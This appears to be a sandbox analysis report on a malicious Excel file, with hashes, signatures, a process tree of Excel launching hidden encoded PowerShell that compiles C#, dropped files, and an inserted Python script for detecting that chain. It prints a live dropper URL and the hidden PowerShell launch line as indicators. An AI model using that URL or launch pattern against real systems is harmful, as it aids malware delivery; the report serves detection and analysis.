Analysis

  • max time kernel
    47s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-11-2024 21:46

General

  • Target

    edff33728be32021df39e1a47cf7f6312ad1e8bfe8bea7622321d864cc59e912.xls

  • Size

    46KB

  • MD5

    599429737e8714d5c491225a35a0366e

  • SHA1

    7049ab521a9043b08b8a5a5015cf281af12d2b41

  • SHA256

    edff33728be32021df39e1a47cf7f6312ad1e8bfe8bea7622321d864cc59e912

  • SHA512

    7336335c258b0b1c1dd7d80c978f399e726678288993ed5035f5a3447c4379ef24dda0c6689c6de133d4f23fd9bce6f485ac5d9ac270ad4000dff8d89894dae5

  • SSDEEP

    768:n4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:4SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden (-w hidden) and without loading a profile (-nop).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\edff33728be32021df39e1a47cf7f6312ad1e8bfe8bea7622321d864cc59e912.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc …
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2520
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3776
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp" "c:\Users\Admin\AppData\Local\Temp\j5y02wq3\CSC3E131DC29F79426D8589513FE96B98E9.TMP"
          4⤵
            PID:2328
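The chain above (EXCEL.EXE spawning a hidden, encoded PowerShell that in turn drives csc.exe and cvtres.exe, the artefacts of a runtime `Add-Type` compile) is the kind of thing a triage script should pick out of a process list automatically. The following is an added example, not part of this report or of the sandbox's own signature code. It reconstructs the report's process tree and dropped-file paths as constructed input; because the real `-Enc` argument is elided on this page, the encoded command is a constructed stand-in (a one-liner that only echoes the dropper URL from the extracted config) and does not represent the sample's payload. The tag names (`office_spawned_script_host`, `runtime_csharp_compile`, etc.) are this example's own, not the sandbox's signature names.

```python
"""Triage helpers for an Office -> PowerShell -> csc.exe chain (added example).

Process records, dropped-file paths and the C2 URL are taken from the report;
the -Enc payload is a constructed stand-in because the real one is elided.
"""
import base64
import ipaddress
import posixpath
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Optional
from urllib.parse import urlsplit

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
DEFAULT_PORTS = {"http": 80, "https": 443}
STATIC_EXTS = {".woff", ".woff2", ".ttf", ".png", ".jpg", ".gif", ".css", ".js"}

# powershell.exe accepts any unique prefix of a parameter name, so -e, -ec,
# -en, -enc ... all mean -EncodedCommand and -w means -WindowStyle.
ENC_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)
WIN_FLAG = re.compile(r"(?:^|\s)[-/](w[a-z]*)\s+(hidden|1)\b", re.I)
# Add-Type compile set: Temp\<8 random chars>\<same>.cmdline / .0.cs / .dll
ADDTYPE_RE = re.compile(r"\\Temp\\([a-z0-9]{8})\\\1\.(cmdline|0\.cs|dll)$", re.I)


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    parent: Optional[int] = None


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -e/-ec/-enc/-EncodedCommand, else None."""
    for m in ENC_FLAG.finditer(cmdline):
        flag = m.group(1).lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy, -ep: not an encoded command
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def hidden_window(cmdline: str) -> bool:
    """True for any abbreviation of -WindowStyle Hidden (or its numeric form 1)."""
    m = WIN_FLAG.search(cmdline)
    return bool(m) and "windowstyle".startswith(m.group(1).lower())


def analyze(procs):
    """Tag each pid with chain-level findings matching the report's signatures."""
    by_pid = {p.pid: p for p in procs}
    tags = {p.pid: set() for p in procs}

    def ancestors(p):
        while p.parent is not None and p.parent in by_pid:
            p = by_pid[p.parent]
            yield p

    for p in procs:
        name = image_name(p.image)
        parent = by_pid.get(p.parent) if p.parent is not None else None
        if parent and image_name(parent.image) in OFFICE_APPS and name in SCRIPT_HOSTS:
            tags[p.pid].add("office_spawned_script_host")
        if name in PS_HOSTS:
            if hidden_window(p.cmdline):
                tags[p.pid].add("hidden_window")
            if decode_encoded_command(p.cmdline) is not None:
                tags[p.pid].add("encoded_command")
        if name == "csc.exe" and any(image_name(a.image) in PS_HOSTS for a in ancestors(p)):
            tags[p.pid].add("runtime_csharp_compile")  # Add-Type under PowerShell
        if name == "cvtres.exe" and parent and image_name(parent.image) == "csc.exe":
            tags[p.pid].add("csc_resource_compile")
    return tags


def addtype_compile_dirs(paths):
    """Temp subfolders holding a complete Add-Type compile set (cmdline, 0.cs, dll)."""
    seen = {}
    for path in paths:
        m = ADDTYPE_RE.search(path)
        if m:
            seen.setdefault(m.group(1), set()).add(m.group(2).lower())
    return {d for d, exts in seen.items() if {"cmdline", "0.cs", "dll"} <= exts}


def url_indicators(url: str):
    """Cheap hints that a 'static asset' URL is really a C2/dropper endpoint."""
    parts, found = urlsplit(url), set()
    try:
        ipaddress.ip_address(parts.hostname or "")
        found.add("ip_literal_host")
    except ValueError:
        pass
    if parts.port is not None and parts.port != DEFAULT_PORTS.get(parts.scheme):
        found.add("nonstandard_port")
    if posixpath.splitext(parts.path)[1].lower() in STATIC_EXTS:
        found.add("static_asset_disguise")
    return found


# ---- constructed input mirroring the report (payload is a stand-in) ----
C2_URL = "https://194.182.164.149:8080/fontawesome.woff"
SAMPLE_SCRIPT = f"$u='{C2_URL}'; Write-Output $u"  # constructed, NOT the real payload
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
PROCS = [
    Proc(4868, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
         r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\edff33728be32021df39e1a47cf7f6312ad1e8bfe8bea7622321d864cc59e912.xls"'),
    Proc(2520, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         f"powershell.exe -nop -w hidden -Enc {SAMPLE_ENC}", parent=4868),
    Proc(3776, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
         r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.cmdline"', parent=2520),
    Proc(2328, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
         r'cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp"', parent=3776),
]
DROPPED = [
    r"C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp",
    r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r0fcm3cy.i3o.ps1",
    r"C:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.dll",
    r"\??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\CSC3E131DC29F79426D8589513FE96B98E9.TMP",
    r"\??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.0.cs",
    r"\??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.cmdline",
]

if __name__ == "__main__":
    for pid, t in analyze(PROCS).items():
        print(pid, sorted(t))
    print("decoded:", decode_encoded_command(PROCS[1].cmdline))
    print("Add-Type dirs:", addtype_compile_dirs(DROPPED))
    print("URL indicators:", sorted(url_indicators(C2_URL)))
```

The decoder deliberately accepts every prefix of `-EncodedCommand` that PowerShell itself accepts, and rejects `-ExecutionPolicy`/`-ep`, which a naive `-e` match would confuse with an encoded command; the Add-Type check requires all three of `.cmdline`, `.0.cs` and `.dll` in the same random Temp folder, which is what the dropped-file list above shows for `j5y02wq3`.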

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp

      Filesize

      1KB

      MD5

      f8d52ada773081c716c7d81f8a094989

      SHA1

      cbbe54ef2b7a9aec626afec554a1800671e8fba6

      SHA256

      a51f4b982bfd79f62f9b9d4aadd58472951257b788cc51338e3a6d7b095c5cdb

      SHA512

      aaba11df323e53af8909f911c15253ae40dda91541954b8abcb220ee0d29233ae50b015f14ec4b99d17e6ef58af4144aee7d4489d7f20d240bc4b41bfdd4f404

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r0fcm3cy.i3o.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.dll

      Filesize

      3KB

      MD5

      85c61b3383800ac3f354d5d20fb574ca

      SHA1

      c0f6a2bb8d22a20602d761a006cb1829df49ee88

      SHA256

      87a002baef47d101aa83602d0791637b3f008b7bbaffcd6724ce44105902f5a7

      SHA512

      d6391a32aa0c8da912d80e043eac9ddd2d4d8c637b645bb1fd7b0d211bf025d8c7becca3aa5150b271c070e165c190a479cc709919c44a9109c85ec303eaf166

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      2KB

      MD5

      13062738302d6640c63e917f6f6bf1a1

      SHA1

      d6d83e2f251eb3d16a5a254d52cc95ba1d06ddeb

      SHA256

      9e4df17d20a06123ce6d3b3cbbc7b9831d052cbd2bcb4c0ae4682578cb16160a

      SHA512

      2b12d118ba601fc8afbcbd8499494603a416869b75a81cd4d00441bcbc1429bf4329f78b6373f9d2aaf05f9e8fd7a8e7cf7881502d30c61f91091e196624fad7

    • \??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\CSC3E131DC29F79426D8589513FE96B98E9.TMP

      Filesize

      652B

      MD5

      007be0b628b0ae0f10bba835090f481f

      SHA1

      d92218f8946f6485ed5ea8cb538564757d04b776

      SHA256

      f1a0b312adf73874976ade43f3af9fc0bc97fafaee15c40f725812b8df913bce

      SHA512

      ca0f06ef28db61204bfe8c8d01c316df31d729acf3fddb77940c3547f649b5a3a45953718a04c39df12fa9ded7e802068bb50a0ca78fca290b67bb3aabbd550c

    • \??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\j5y02wq3\j5y02wq3.cmdline

      Filesize

      369B

      MD5

      57ff751eee787ca65c1d5e0ad1fad16b

      SHA1

      b59638ed73c956d1d9112fe29bdbdfa3925c7fbb

      SHA256

      d85fe468fafec968d176d137cd5f6db5c73788d893717e460316fb947a09d974

      SHA512

      3a0bcce641db3f7d9aca7944dca0705088e2fdb3e62103429fc22c340acf625a5e019f5fd45bc76af04a58369cf9625de33c1bec6b9ba908688baa39fb32b4f1

    • memory/2520-32-0x00000176F9130000-0x00000176F9152000-memory.dmp

      Filesize

      136KB

    • memory/2520-56-0x00000176F9160000-0x00000176F9168000-memory.dmp

      Filesize

      32KB

    • memory/4868-5-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-1-0x00007FFA2E6AD000-0x00007FFA2E6AE000-memory.dmp

      Filesize

      4KB

    • memory/4868-11-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-12-0x00007FF9EC280000-0x00007FF9EC290000-memory.dmp

      Filesize

      64KB

    • memory/4868-13-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-14-0x00007FF9EC280000-0x00007FF9EC290000-memory.dmp

      Filesize

      64KB

    • memory/4868-15-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-17-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-16-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-19-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-18-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-21-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-20-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-23-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-25-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-10-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-8-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-9-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-7-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-6-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB

    • memory/4868-0-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB

    • memory/4868-4-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB

    • memory/4868-2-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB

    • memory/4868-63-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-64-0x00007FFA2E6AD000-0x00007FFA2E6AE000-memory.dmp

      Filesize

      4KB

    • memory/4868-65-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-69-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-70-0x00007FFA2E610000-0x00007FFA2E805000-memory.dmp

      Filesize

      2.0MB

    • memory/4868-3-0x00007FF9EE690000-0x00007FF9EE6A0000-memory.dmp

      Filesize

      64KB